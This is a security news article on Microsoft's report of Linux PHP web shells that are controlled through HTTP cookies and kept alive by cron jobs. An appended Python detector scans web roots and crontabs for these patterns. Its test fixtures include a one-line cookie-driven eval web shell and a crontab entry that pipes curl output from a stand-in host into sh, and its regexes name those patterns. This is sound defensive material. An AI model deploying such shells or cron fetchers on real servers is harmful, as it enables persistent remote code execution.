
Microsoft Exposes Sophisticated Linux Web Shells Using HTTP Cookies for Stealthy Persistence


A sophisticated and stealthy attack campaign targeting Linux servers has been uncovered by Microsoft's security researchers. Threat actors are deploying PHP-based web shells that uniquely leverage HTTP cookies as their primary command-and-control (C2) channel, a technique designed to evade traditional detection mechanisms. Unlike conventional web shells that expose malicious commands through easily monitored URL parameters or POST request bodies, these shells remain dormant until activated by specific, attacker-supplied values embedded directly within incoming HTTP cookies. This method allows the malicious code to blend seamlessly with normal web traffic, making it significantly harder for security tools and analysts to identify anomalous behavior indicative of remote code execution.

The persistence mechanism employed by these threats is equally concerning. Microsoft's Defender Security Research Team detailed that upon successful compromise, the attackers establish a foothold by creating cron jobs—scheduled tasks on Linux systems. These cron jobs are configured to periodically fetch and execute secondary payloads or scripts from attacker-controlled servers. This dual-layer approach ensures that even if the initial web shell is discovered and removed, the cron job will persistently attempt to re-establish the connection and download new malicious components, granting the threat actors a resilient and long-term presence on the infected host. The use of cron for persistence is a classic yet effective technique, capitalizing on a legitimate system feature to maintain access.

This campaign highlights a significant evolution in the tactics of cybercriminals targeting web infrastructure. By moving the control channel from the request body to the cookie header, attackers are exploiting a potential blind spot in many web application firewall (WAF) rules and logging configurations, which may not scrutinize cookie contents with the same rigor as other parts of an HTTP request. Security teams are advised to enhance their monitoring strategies to include deep inspection of cookie values for suspicious patterns or encoded commands. Furthermore, robust server hardening, including regular audits of cron jobs and file integrity monitoring for web directories, is critical to detect and mitigate such advanced, fileless persistence techniques.
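As an added example (not Microsoft's detection logic and not code from the campaign), the Python below implements two of the checks recommended above: a static scan of a web root for PHP files that feed cookie-supplied data into a code or command execution sink, and a review of crontab text for entries that fetch and run remote content in one step. The regexes, the file-extension list and the sample PHP and crontab fixtures are constructed assumptions, not indicators from the report.

```python
import os
import re

# Reads from the cookie superglobal (direct index or filter_input on INPUT_COOKIE).
COOKIE_RE = re.compile(r"\$_COOKIE\b|\bfilter_input\s*\(\s*INPUT_COOKIE\b")
# PHP functions that turn a string into code or a shell command.
SINK_RE = re.compile(r"\b(eval|assert|system|exec|shell_exec|passthru|popen|proc_open)\s*\(", re.I)
# Decoders commonly wrapped around the input to hide the command in transit.
DECODER_RE = re.compile(r"\b(base64_decode|gzinflate|gzuncompress|str_rot13|hex2bin)\s*\(", re.I)
# Cron commands that download and execute remote content in a single step.
CRON_FETCH_RE = re.compile(r"\b(curl|wget)\b[^|;]*\|\s*(ba|z|da)?sh\b|\b(curl|wget)\b.*\b(bash|sh)\s+-c\b")

def php_indicators(src: str) -> dict:
    """Indicators found in one PHP source string."""
    return {
        "cookie_read": bool(COOKIE_RE.search(src)),
        "sinks": sorted({m.group(1).lower() for m in SINK_RE.finditer(src)}),
        "decoders": sorted({m.group(1).lower() for m in DECODER_RE.finditer(src)}),
    }

def is_cookie_shell_candidate(ind: dict) -> bool:
    """Flag only the combination this campaign relies on: cookie input reaching an exec sink."""
    return ind["cookie_read"] and bool(ind["sinks"])

def scan_webroot(root: str) -> list:
    """Walk a web root and return (path, indicators) for every candidate PHP file."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".php", ".phtml", ".phar")):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    ind = php_indicators(fh.read())
            except OSError:
                continue  # unreadable file: skip rather than abort the whole scan
            if is_cookie_shell_candidate(ind):
                hits.append((path, ind))
    return hits

def suspicious_cron_lines(crontab_text: str) -> list:
    """Cron lines that fetch-and-execute remote content; blank and comment lines are ignored."""
    return [ln for ln in crontab_text.splitlines()
            if ln.strip() and not ln.lstrip().startswith("#") and CRON_FETCH_RE.search(ln)]

# Constructed fixtures for a dry run; these are not samples from the campaign.
BENIGN_PHP = '<?php $lang = $_COOKIE["lang"] ?? "en"; echo htmlspecialchars($lang);'
FLAGGED_PHP = '<?php if (isset($_COOKIE["t"])) { eval(base64_decode($_COOKIE["t"])); }'
CRONTAB = ("# m h dom mon dow command\n"
           "0 3 * * * /usr/bin/logrotate /etc/logrotate.conf\n"
           "*/15 * * * * curl -s http://example.invalid/u.sh | sh\n")
```

Run `scan_webroot("/var/www")` and `suspicious_cron_lines(open("/etc/crontab").read())` (plus each user's crontab) on a host to turn the two checks into a periodic audit; a benign cookie read such as a language preference is not flagged because it never reaches an execution sink.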
